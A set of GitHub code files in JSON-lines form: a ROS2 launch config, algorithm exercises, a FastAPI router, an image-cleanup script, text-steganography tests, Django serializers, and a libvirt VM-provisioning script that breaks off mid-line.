SOURCE node (float32 value)\nrel_type = 'REL' # reliability type (BE=best effort, anything else is reliable.)\nmy_node = 0 # starting node ID\ndata_type_suffix = '1kb' # edit this to change data size in test\nexe_source = 'ipcsource_' + data_type_suffix\nexe_work = 'ipcwork_' + data_type_suffix\nexe_sink = 'ipcsink_' + data_type_suffix\nrmw_type = os.environ.get('RMW_IMPLEMENTATION') # RMW type used for test (for SINK node results)\n\ndef generate_launch_description():\n return LaunchDescription([\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n # SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_2', rmw_type, 'h-3p-t1'],\n name='sink1',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n # SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_3', rmw_type, 'h-3p-t2'],\n name='sink2',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n 
# SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_4', rmw_type, 'h-3p-t3'],\n name='sink3',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '3', 'pt_profile_topic_0_1', 'pt_profile_topic_1_4'],\n name='proc3'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '2', 'pt_profile_topic_0_1', 'pt_profile_topic_1_3'],\n name='proc2'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '1', 'pt_profile_topic_0_1', 'pt_profile_topic_1_2'],\n name='proc1'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_source,\n output='screen',\n # SOURCE args: testDur, REL, pubFreq, myNodeId, toTopic\n arguments=[test_duration, rel_type, pub_frequency, '0', 'pt_profile_topic_0_1'],\n name='source'\n )\n ])\n","repo_name":"neil-rti/ros2_mp_latency","sub_path":"mp_latency/launch/mplat_par_3t3.py","file_name":"mplat_par_3t3.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"40786933849","text":"# coding=utf-8\n\"\"\"\nGiven two strings str1 and str2 and below operations that can performed on str1.\nFind minimum number of edits (operations) required to convert ‘str1’ into ‘str2’\n\n* Insert\n* Remove\n* Replace\n\nAll of the above operations are of equal cost.\n\nInput: str1 = \"geek\", str2 = \"gesek\"\nOutput: 1\nWe can convert str1 into str2 by inserting a 's'.\n\nInput: str1 = \"cat\", str2 = \"cut\"\nOutput: 1\nWe can convert str1 into str2 by replacing 'a' with 'u'.\n\nInput: str1 = \"sunday\", str2 = \"saturday\"\nOutput: 3\nLast three and first characters are same. We basically\nneed to convert \"un\" to \"atur\". This can be done using\nbelow three operations.\nReplace 'n' with 'r', insert t, insert a\n\"\"\"\n\nimport unittest\n\n\ndef min_of_three(first, second, third):\n \"\"\" Calculates a min of three. 
parameters should be comparable \"\"\"\n return min(min(first, second), third)\n\n\ndef edit_distance_rec(str1, str2, len1, len2):\n \"\"\"\n Edit Distance Implementation naive approach using recursion\n :param str1: first string\n :param str2: second string\n :param len1: length of str1\n :param len2: length of str2\n :return: number of operations to be perform in order to transform str1 into str2\n :rtype: int\n \"\"\"\n\n if not len1:\n return len2\n\n if not len2:\n return len1\n\n if str1[len1-1] == str2[len2-1]:\n return edit_distance_rec(str1, str2, len1-1, len2-1)\n\n return 1 + min_of_three(\n edit_distance_rec(str1, str2, len1-1, len2), # delete from first\n edit_distance_rec(str1, str2, len1, len2-1), # insert into first\n edit_distance_rec(str1, str2, len1-1, len2-1) # replace char in first\n )\n\n\ndef edit_distance_dp(str1, str2):\n \"\"\"\n Edit Distance Implementation dynamic programming approach\n :param str1: first string\n :param str2: second string\n :return: number of operations to be perform in order to transform str1 into str2\n :rtype: int\n \"\"\"\n matrix = [[0 for _ in range(len(str1) + 1)] for _ in range(len(str2) + 1)]\n for i in range(len(str1)+1):\n matrix[0][i] = i\n for i in range(len(str2)+1):\n matrix[i][0] = i\n\n for column in range(1, len(str1)+1):\n for row in range(1, len(str2)+1):\n if str1[column-1] == str2[row-1]:\n curry = 0\n else:\n curry = 1\n matrix[row][column] = curry + min_of_three(\n matrix[row - 1][column],\n matrix[row][column - 1],\n matrix[row - 1][column - 1]\n )\n return matrix[len(str2)][len(str1)]\n\n\nclass TestEditDistance(unittest.TestCase):\n \"\"\" Test cases for Edit Distance \"\"\"\n\n def test_edit_distance_rec(self):\n \"\"\" Test Edit Distance Recursive \"\"\"\n print('==== Test Edit Distance Recursive ====')\n str1 = 'sunday'\n str2 = 'saturday'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 3)\n\n str1 = ''\n str2 = 'test'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 4)\n\n str1 = 'geek'\n str2 = 'gesek'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n str1 = 'cat'\n str2 = 'cut'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n def test_edit_distance_dp(self):\n \"\"\" Test Edit Distance DP \"\"\"\n print('==== Test Edit Distance DP ====')\n str1 = 'sunday'\n str2 = 'saturday'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 3)\n\n str1 = ''\n str2 = 'test'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 4)\n\n str1 = 'geek'\n str2 = 'gesek'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n str1 = 'cat'\n str2 = 
'cut'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n","repo_name":"UseTheApi/algorithms","sub_path":"python/dynamic_programming/edit_distance/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"94"} +{"seq_id":"40514108670","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n prev = None # 반환할 list\n curr = head # 가지고 돌 curr\n\n while curr:\n next = curr.next # 다음을 변수에 저장\n curr.next = prev # 현재 다음을 prev로 저장한다 즉, prev를 하나씩 뒤로 밀면서 앞에 추가하는 것\n prev = curr # prev는 현재로 노드로 넣어놓는다\n curr = next # 리스트 순회\n return prev","repo_name":"oio337a/Algorithm-study-Leetcode","sub_path":"parksooo/level1/day10/206.py","file_name":"206.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36499264889","text":"from app.delivery.shop.deps import shop_paging_params\nfrom app.dto.api.shop import ShopListPagingParams, ShopListRespDTO, ShopRespDTO\nfrom app.services.shop import ShopsService\nfrom fastapi import APIRouter, Depends\n\nrouter = APIRouter(\n prefix=\"/shops\",\n tags=[\"shop\"],\n)\n\n\n@router.get(\"/{shop_id}\", response_model=ShopRespDTO)\nasync def get_shop(\n shop_id: int, shop_service: ShopsService = Depends()\n) -> ShopRespDTO:\n return await shop_service.get(shop_id)\n\n\n@router.get(\"\", response_model=ShopListRespDTO)\nasync def get_list(\n shop_service: ShopsService = Depends(),\n paging_params: ShopListPagingParams = Depends(shop_paging_params),\n) -> ShopListRespDTO:\n return await shop_service.get_list(paging_params)\n","repo_name":"ivaaahn/retailer","sub_path":"retailer/app/delivery/shop/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"29846889372","text":"import sys\nimport collections\nsys.stdin = open('BOJ_2536.txt', 'r')\n\ndef BFS():\n for i in range(1, k+1):\n if bus[i][0] <= sx <= bus[i][2] and bus[i][1] <= sy <= bus[i][3]:\n q.append(i)\n visited[i] = 1\n\n while q:\n idx = q.popleft()\n if bus[idx][0] <= dx <= bus[idx][2] and bus[idx][1] <= dy <= bus[idx][3]:\n return visited[idx]\n for j in range(1, k+1):\n if not visited[j]:\n if bus[idx][0] <= bus[j][2] and bus[idx][2] >= bus[j][0] and bus[idx][1] <= bus[j][3] and bus[idx][3] >= bus[j][1]:\n visited[j] = visited[idx] + 1\n q.append(j)\n\nm, n = map(int, input().split())\nk = int(input())\nbus = [0] * (k+1)\nfor i in range(k):\n b, x1, y1, x2, y2 = map(int, input().split())\n if x1 > x2:\n x1, x2 = x2, x1\n if y1 > y2:\n y1, y2 = y2, y1\n bus[b] = [x1, y1, x2, y2]\nsx, sy, dx, dy = map(int, input().split())\nvisited = [0] * (k+1)\nq = collections.deque()\n\nprint(BFS())","repo_name":"Sanghyeok-Jeon/Algorithm","sub_path":"Python/BAEKJOON/BOJ_2536_버스갈아타기.py","file_name":"BOJ_2536_버스갈아타기.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35339759169","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: 
int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\nmod = 998244353\ndpos4 = ((1, 0), (0, 1), (-1, 0), (0, -1))\ndpos8 = ((0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1))\ndef main():\n N,S = mi()\n A = li()\n dp = [False] * (S+1)\n dp[0] = True\n\n for i in range(N):\n for s in range(S,-1,-1):\n if s - A[i] >= 0:\n dp[s] = dp[s-A[i]] | dp[s] \n\n if dp[S]:\n print('Yes')\n else:\n print('No')\n \n\nif __name__ == '__main__':\n main()","repo_name":"youarenes4649/Atcoder_Python","sub_path":"2023/11th/day_17/tessokuA18.py","file_name":"tessokuA18.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27303346557","text":"# From Nina\n\nimport sys, os\nimport shutil\nfrom os import listdir\nfrom PIL import Image\n\n\n\n# remove empty files\n\npath = \"./img/\"\n\nc = 0\n\nfiles = os.listdir(path)\n\nfor f in files:\n\tif os.stat(path+f).st_size == 0:\n\t\tos.remove(path+f)\n\t\tc = c + 1\n#\t\tshutil.move(path+f,\"./empty/\"+f) \n\t\tprint(f)\n\t\t\nprint(c)\t\t\n\n\t\t\n\t\t\n\n\n# remove corrupted files\n\nc = 0\n\nfor filename in listdir('./img/'):\n\tif filename.endswith('.jpg'):\n\t\ttry:\n\t\t\timg = Image.open('./img/'+filename) # open the image file\n\t\t\timg.verify() # verify that it is, in fact an image\n\t\texcept (IOError, SyntaxError) as e:\n\t\t\tprint('Bad file:', filename) # print out the names of corrupt files\t\n\t\t\tos.remove('./img/'+filename)\t\n\t\t\tc = c+1\n\t\t\t\nprint(c)\t\t\t\n\n\n\n# remove files that TF cannot read\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\npath = \"./img/\"\n\nfiles = os.listdir(path)\n\nc = 0\n\nfor f in files:\n\tif f.endswith(\".jpg\"):\n\t\tprint(\"fffffffff\",f)\n#\t\timage1 = tf.io.decode_image(path+f)\n\t\t\n\t\ttry:\n\t\t\timage = tf.keras.preprocessing.image.load_img(path+f)\n\t\t\tinput_arr = keras.preprocessing.image.img_to_array(image)\n\t\texcept:\n\t\t\tos.remove(path+f)\t\t\t\n\t\t\tc = c+1\n\t\t\t\nprint(c)\t\t\t\n","repo_name":"sbrl/research-smflooding","sub_path":"src/lib/data/check_image.py","file_name":"check_image.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"12148639711","text":"import pytest\nfrom ..src import steganos_encode\n\n@pytest.mark.parametrize('length, expected', [\n (3, 'abc'),\n (5, 'abcab'),\n (2, 'ab')\n])\ndef test_repeated_string(length, expected):\n assert expected == steganos_encode.repeat('abc', length)\n\n@pytest.mark.parametrize('length, expected', [\n (3, ['a', 'b', 'c']),\n (5, ['a', 'b', 'c', 'a', 'b']),\n (2, ['a', 'b'])\n])\ndef test_repeated_list(length, expected):\n assert expected == steganos_encode.repeat(['a', 'b', 'c'], length)\n\ndef test_filter_by_bits():\n # given\n bits = '101'\n xs = ['a', 'b', 'c']\n\n # when\n result = steganos_encode.filter_by_bits(xs, bits)\n\n # then\n assert result == ['a', 'c']\n\ndef test_make_change_for_single_change():\n # given\n text = 'This is his dog.'\n changes = [(9, 11, 'er')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'This is her dog.'\n\ndef test_make_changes_for_two_changes():\n # given\n text = 'This is his dog.'\n changes = [(9, 11, 'er'), (12, 15, 'cat')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'This is her cat.'\n\ndef 
test_make_changes_when_change_is_different_length():\n # given\n text = 'This is just a sample string.'\n changes = [(22, 28, 'text'), (0, 4, 'It')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'It is just a sample text.'\n\ndef test_execute_branchpoints_when_one_is_sandwiched():\n # given\n text = '\"How is she?\" he asked.'\n branchpoints = [\n [(0, 1, \"'\"), (12, 13, \"'\")],\n [(8, 9, '')]\n ]\n\n # when\n result = steganos_encode.execute_branchpoints(branchpoints, text)\n\n # then\n assert result == \"'How is he?' he asked.\"\n\n","repo_name":"fastforwardlabs/steganos","sub_path":"steganos/test/steganos_encode_test.py","file_name":"steganos_encode_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"94"} +{"seq_id":"41148771179","text":"from rest_framework import serializers\nfrom .models import Product, Genere, Review, CastMember, SavedMovies, Review, Notification\nfrom users.models import User\n\n\n\nclass GenereRetriveSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Genere\n fields = ['id', 'name']\n\n\n# class CustomerDetailSerializer(serializers.ModelSerializer):\n# followers_count = serializers.SerializerMethodField()\n# following_count = serializers.SerializerMethodField()\n# is_following = serializers.SerializerMethodField()\n\n# # def get_is_following(self, obj):\n# # if self.context['request'].user.is_authenticated:\n# # followers_subquery = self.context['followers_subquery_list']\n# # if obj.id in followers_subquery:\n# # return True\n# # return False\n# # return False\n\n# # def get_followers_count(self, obj):\n# # return obj.followers.count()\n\n# # def get_following_count(self, obj):\n# # return obj.following.count()\n\n# class Meta:\n# model = User\n# fields = ['username', 'first_name', 'last_name', 'designation', 'profile_pic', \n# 'followers_count', 'following_count', 'is_following']\n\n\nclass CustomerSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'designation', 'profile_pic']\n\n\nclass CastSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CastMember\n fields = '__all__'\n\n\nclass CastRetriveSerializer(serializers.ModelSerializer):\n cast_member = CustomerSerializer()\n\n class Meta:\n model = CastMember\n fields = '__all__'\n\n\nclass ProductRetriveSerializer(serializers.ModelSerializer):\n genere = GenereRetriveSerializer(many=True)\n customer = serializers.SerializerMethodField()\n like_count = serializers.SerializerMethodField()\n dislike_count = serializers.SerializerMethodField()\n has_liked = serializers.SerializerMethodField()\n has_disliked = serializers.SerializerMethodField()\n cast = serializers.SerializerMethodField()\n owner = serializers.SerializerMethodField()\n review_count = serializers.SerializerMethodField()\n video_quality = serializers.SerializerMethodField()\n\n def get_video_quality(self, obj):\n video_url = obj.video\n splitted_list = video_url.split('/upload')\n if len(splitted_list) == 0:\n return obj.video\n else:\n video_quality_dict = {\n \"p280\": splitted_list[0] + '/upload/q_50' + splitted_list[1],\n \"p360\": splitted_list[0] + '/upload/q_40' + splitted_list[1],\n \"p720\": splitted_list[0] + '/upload/q_30' + splitted_list[1]\n }\n return video_quality_dict\n\n def get_review_count(self, obj):\n return Review.objects.filter(movie=obj.id).count()\n\n def get_cast(self, obj):\n casts 
= CastMember.objects.filter(product=obj.id)\n ser = CastRetriveSerializer(casts, many=True)\n return ser.data\n\n def get_customer(self, obj):\n if obj.customer.first_name==\"\" and obj.customer.last_name==\"\":\n return obj.customer.username\n return obj.customer.first_name + ' ' + obj.customer.last_name\n \n def get_like_count(self, obj):\n return obj.likes.count()\n\n def get_dislike_count(self, obj):\n return obj.dislikes.count()\n \n def get_has_liked(self, obj):\n user = self.context['request'].user\n return obj.likes.filter(pk=user.pk).exists()\n\n def get_has_disliked(self, obj):\n user = self.context['request'].user\n return obj.dislikes.filter(pk=user.pk).exists()\n \n def get_owner(self, obj):\n return obj.customer.id\n\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass ProductCreateSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n genere = GenereRetriveSerializer(many=True)\n customer = serializers.SerializerMethodField()\n cast = CastSerializer(many=True)\n like_count = serializers.SerializerMethodField()\n dislike_count = serializers.SerializerMethodField()\n has_liked = serializers.SerializerMethodField()\n has_disliked = serializers.SerializerMethodField()\n is_own_product = serializers.SerializerMethodField()\n\n def get_customer(self, obj):\n if obj.customer.first_name==\"\" and obj.customer.last_name==\"\":\n return obj.customer.username\n return obj.customer.first_name + ' ' + obj.customer.last_name\n \n def get_like_count(self, obj):\n return obj.likes.count()\n\n def get_dislike_count(self, obj):\n return obj.dislikes.count()\n \n def get_has_liked(self, obj):\n user = self.context['request'].user\n return obj.likes.filter(pk=user.pk).exists()\n\n def get_has_disliked(self, obj):\n user = self.context['request'].user\n return obj.dislikes.filter(pk=user.pk).exists()\n \n def get_is_own_product(self, obj):\n user = self.context['request'].user\n if obj.customer == user:\n return True\n return False\n\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n user = CustomerSerializer()\n\n class Meta:\n model = Review\n fields = '__all__'\n\n\nclass ReviewAddSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Review\n fields = '__all__'\n\nclass ListAllReviewsGivenSerializer(serializers.ModelSerializer):\n movie = ProductCreateSerializer()\n\n class Meta:\n model = Review\n fields = '__all__'\n\n\nclass SavedMoviesSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = SavedMovies\n fields = '__all__'\n\n\nclass SavedMovieListsSerializer(serializers.ModelSerializer):\n movie = ProductRetriveSerializer()\n\n class Meta:\n model = SavedMovies\n fields = '__all__'\n\n\nclass NotificationAddSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Notification\n fields = '__all__'","repo_name":"deekshi-hari/theweedoc-backend","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41299131368","text":"# Create VM is a multi-step process:\n# TODO: update this list to reflect new functionalities that is added after the process is written\n# - create a disk OR copy a pre-configured VM OR create a disk pool and create a volume\n# - can also use filesystem-specific cloning features like ZFS or LVM 
snapshots\n# - resize the disk to appropriate sizes\n# - create Cloud-Init definitions eg: user, filesystem, packages, update\n# - optionally create custom networks rather than DHCP\n# - ~~deploy Cloud-Init configs either using `cloud-localds` or deploy to a webserver~~ NO NEED. WE HAVE `nocloud-net`\n# - create VM definitions on libvirt using libvirt Python API (oh lord pls no)\n# - define into libvirt to be registered\n# - start the VM\n\n# It would be nice if we can boot to network, reboot and return to normal boot sequence but eh\nfrom jinja2 import FileSystemLoader, Environment, select_autoescape\nimport subprocess\nimport libvirt\nfrom xml.etree import ElementTree\nfrom uuid import uuid4\n\n# String definitions\nERR_POOL_NOT_FOUND = 'Pool \"{}\" is not found.'\nERR_VOLUME_NOT_FOUND = 'Volume \"{}\" is not found in pool \"{}\".'\nERR_DOMAIN_NOT_FOUND = 'Domain \"{}\" is not found.'\n\n# Parameters\nLIBVIRT_URI = 'qemu+ssh://chong601@10.102.0.5/system'\nMEGABYTES = 1024**2\nGIGABYTES = 1024**3\n\nDOMAIN_NAME = 'vm-ubuntu-focal-cloud-init-test-4'\nCLOUD_DS = 'ds=nocloud-net;s=http://{}:{}/{}/'\nDISK_NAME = 'disk-2.img'\nDISK_TYPE = 'qcow2'\nDISK_CAPACITY = 100*GIGABYTES\n\nHOST_FILESYSTEM = 'zfs'\nPOOL_NAME = 'vm-ubuntu-focal-cloud-init-test-4'\nPOOL_TYPE = 'dir'\nTARGET_PATH = '/zfs-storage-test/kvm-area/{}'.format(DOMAIN_NAME)\nPOOL_AUTOSTART = 1\nZFS_IS_DATASET = True\n\nEMULATION_TYPE = 'kvm'\nMEMORY_CAPACITY = 4\nMAX_MEMORY_CAPACITY = 16\nPROVISIONED_CPU_COUNT = 4\nHOST_CPU_COUNT = 24\nVM_UUID = str(uuid4())\nSOCKET_COUNT = 1\nCORE_COUNT = 24\nTHREAD_COUNT = 1\n\n# Internal definitions\nENABLED_ESCAPES = ['html', 'xml']\nDS_HOST = '10.102.7.97'\nDS_PORT = '5000'\nfinal_smbios_data = CLOUD_DS.format(DS_HOST, DS_PORT, VM_UUID)\nBIOS_VENDOR = 'NoCloud-libvirt-QEMU-KVM'\nVNC_PORT = -1\nVNC_LISTEN_IP = '0.0.0.0'\nDISK_PATH = '/zfs-storage-test/kvm-area'\nIMAGE_NAME = 'focal-server-cloudimg-amd64.img'\nj2_env = Environment(\n loader=FileSystemLoader('templates'),\n autoescape=select_autoescape(ENABLED_ESCAPES),\n trim_blocks=True,\n lstrip_blocks=True\n)\n\nprint('Connecting to libvirt host at {}...'.format(LIBVIRT_URI))\nclient = libvirt.open(LIBVIRT_URI)\nprint('libvirt host \"{}\" connected.'.format(client.getHostname()))\n# Clone the VM pool\n# TODO: Paramiko integration\n# subprocess.run([])\n\n# Create a new pool\n# TODO: write pool storage code\n# XML GENERATION TIME *shudders*\nprint('Generating new pool definition for pool name {}...'.format(POOL_NAME))\npool_attr = {'type': POOL_TYPE}\npool_root = ElementTree.Element('pool', pool_attr)\npool_name = ElementTree.SubElement(pool_root, 'name').text = POOL_NAME\npool_target = ElementTree.SubElement(pool_root, 'target')\npool_target_path = ElementTree.SubElement(pool_target, 'path').text = TARGET_PATH\n\npool_xml = ElementTree.tostring(pool_root, 'unicode')\nprint(pool_xml)\nprint('Pool definition complete.')\nprint('Informing {} to create pool \"{}\"...'.format(client.getHostname(), POOL_NAME))\nclient.storagePoolDefineXML(pool_xml)\nprint('Pool {} is create at {}.'.format(POOL_NAME, client.getHostname()))\n\nprint('Informing {} to set pool \"{}\" to autostart...'.format(client.getHostname(), POOL_NAME))\npool_obj = client.storagePoolLookupByName(POOL_NAME)\npool_obj.setAutostart(POOL_AUTOSTART)\nprint('Pool {} at {} autostarted'.format(POOL_NAME, client.getHostname()))\n\n# Define a new volume for libvirt to monitor\nprint('Generating definitions for volume {}\"...'.format(DISK_NAME))\nvolume = ElementTree.Element('volume')\nname = 
ElementTree.SubElement(volume, 'name').text = DISK_NAME\ncapacity = ElementTree.SubElement(volume, 'capacity').text = str(DISK_CAPACITY)\ntarget = ElementTree.SubElement(volume, 'target')\n# format_attr has type which is the type of disk to create eg: raw, bochs, qcow, qcow2, qed, vmdk\nformat_attr = {'type': DISK_TYPE}\ndisk_format = ElementTree.SubElement(target, 'format', format_attr)\n\n\n\n# TODO: look into key\ndef call_qemu_img(self, source, dest, target_disk_format, disk_capacity, allocation_method):\n subprocess.run([])\n\n\nvolume_xml = ElementTree.tostring(volume, 'unicode')\nprint(volume_xml)\npool = client.storagePoolLookupByName(POOL_NAME)\nprint('Generation complete.')\n\nprint('Adding volume \"{}\" to pool \"{}\" at \"{}\"'.format(DISK_NAME, POOL_NAME, client.getHostname()))\n# WARNING: ZFS DO NOT support falloc method of disk allocation\n# TODO: add more disk type for other filesystems\nif DISK_TYPE == 'qcow2':\n if HOST_FILESYSTEM == 'zfs' and ZFS_IS_DATASET:\n # TODO: ZFS-specific metadata preallocation\n # FUCK YOU LIBVIRT\n # call_qemu_img(source,dest,target_disk_format,disk_capacity,'metadata')\n try:\n pool = client.storagePoolLookupByName(POOL_NAME)\n except libvirt.libvirtError:\n print(ERR_POOL_NOT_FOUND.format(POOL_NAME))\n exit(1)\n if pool.isActive() == libvirt.VIR_STORAGE_POOL_INACTIVE:\n pool.create()\n volume_libvirt = pool.createXML(volume_xml)\n else:\n volume_libvirt = pool.createXML(volume_xml)\nelse:\n print(\"Storage type is not implemented (yet)\")\nprint('Volume \"{}\" is created on pool \"{}\" at \"{}\"'.format(DISK_NAME, POOL_NAME, client.getHostname()))\n# Expand the disk to appropriate size\n# TODO: write vol-resize code\nprint('Informing host \"{}\" to resize volume \"{}\" to {} bytes...'.format(client.getHostname(), DISK_NAME, DISK_CAPACITY))\npool = disk = None\n\ntry:\n pool = client.storagePoolLookupByName(POOL_NAME)\nexcept libvirt.libvirtError:\n print(ERR_POOL_NOT_FOUND.format(POOL_NAME))\n exit(1)\nif pool.isActive() == libvirt.VIR_STORAGE_POOL_INACTIVE:\n pool.create()\ntry:\n disk = pool.storageVolLookupByName(DISK_NAME)\nexcept libvirt.libvirtError:\n print(ERR_VOLUME_NOT_FOUND.format(DISK_NAME, POOL_NAME))\n exit(1)\n\n# From libvirt volume resize documentation:\n#\n# > Normally, the operation treats @capacity as the new size in bytes;\n# > but if @flags contains VIR_STORAGE_VOL_RESIZE_DELTA,\n# > then @capacity represents the size difference to add to the current size.\n# > It is up to the storage pool implementation whether unaligned requests\n# > are rounded up to the next valid boundary, or rejected.\n#\n# OK libvirt, you do you I guess.\n# This is the right place to use absolute size resizing.\n# TODO: do proper size checks before blindly resizing them\ndisk.resize(DISK_CAPACITY, libvirt.VIR_STORAGE_VOL_RESIZE_DELTA)\nprint('Volume resize done.')\n\n# Generate domain XML\n# TODO: complete Jinja2 XML implementation\n# LAZINESS SUCK. Even if I have Jinja2 imports included LOL.`\n\n# Define in libvirt\n# TODO: write define domain code\n# ALSO TODO: MAKE THIS DOMAIN XML THING A CLASS OF ITSELF. 
I HATE HOW IT LOOKS RIGHT NOW.\n# oooooooooooooooooooooooooooooooooooooooh fuck me why do I have to go through this...\n# This kind of code is I guess why we have so many bad developers out there, but to be honest:\n# - XML is hateful\n# - XML APIs forced me to do this\n# - the fact that libvirt **ENFORCES** the need to use XML which is just asinine\nprint('Generating domain definition for domain \"{}\"...'.format(DOMAIN_NAME))\ndomain_attr = {'type': EMULATION_TYPE}\nxml_domain = ElementTree.Element('domain', domain_attr)\nxml_name = ElementTree.SubElement(xml_domain, 'name').text = DOMAIN_NAME\nxml_uuid = ElementTree.SubElement(xml_domain, 'uuid').text = VM_UUID\n# Memory attributes are **strictly** required because it defaults to KiB\n# 10/10 libvirt, assuming that people actually use KiB to define memory.\nmemory_attr = {'unit': 'GiB'}\nxml_memory = ElementTree.SubElement(xml_domain, 'memory', memory_attr).text = str(MAX_MEMORY_CAPACITY)\ncurrent_memory_attr = {'unit': 'GiB'}\nxml_current_memory = ElementTree.SubElement(xml_domain, 'currentMemory', current_memory_attr).text = str(MEMORY_CAPACITY)\nvcpu_attr = {'current': str(PROVISIONED_CPU_COUNT)}\nxml_vcpu = ElementTree.SubElement(xml_domain, 'vcpu', vcpu_attr).text = str(HOST_CPU_COUNT)\nxml_os = ElementTree.SubElement(xml_domain, 'os')\nos_smbios_attr = {'mode': 'sysinfo'}\nxml_os_smbios = ElementTree.SubElement(xml_os, 'smbios', os_smbios_attr)\nos_type_attr = {'arch': 'x86_64', 'machine': 'q35'}\nxml_os_type = ElementTree.SubElement(xml_os, 'type', os_type_attr).text = 'hvm'\nos_boot_attr = {'dev': 'hd'}\nxml_os_boot = ElementTree.SubElement(xml_os, 'boot', os_boot_attr)\nsysinfo_attr = {'type': 'smbios'}\nxml_sysinfo = ElementTree.SubElement(xml_domain, 'sysinfo', sysinfo_attr)\nxml_sysinfo_bios = ElementTree.SubElement(xml_sysinfo, 'bios')\nsysinfo_bios_vendor_attr = {'name': 'vendor'}\nxml_sysinfo_bios_entry = ElementTree.SubElement(xml_sysinfo_bios, 'entry', sysinfo_bios_vendor_attr).text = BIOS_VENDOR\nxml_sysinfo_system = ElementTree.SubElement(xml_sysinfo, 'system')\nsysinfo_system_manufacturer_attr = {'name': 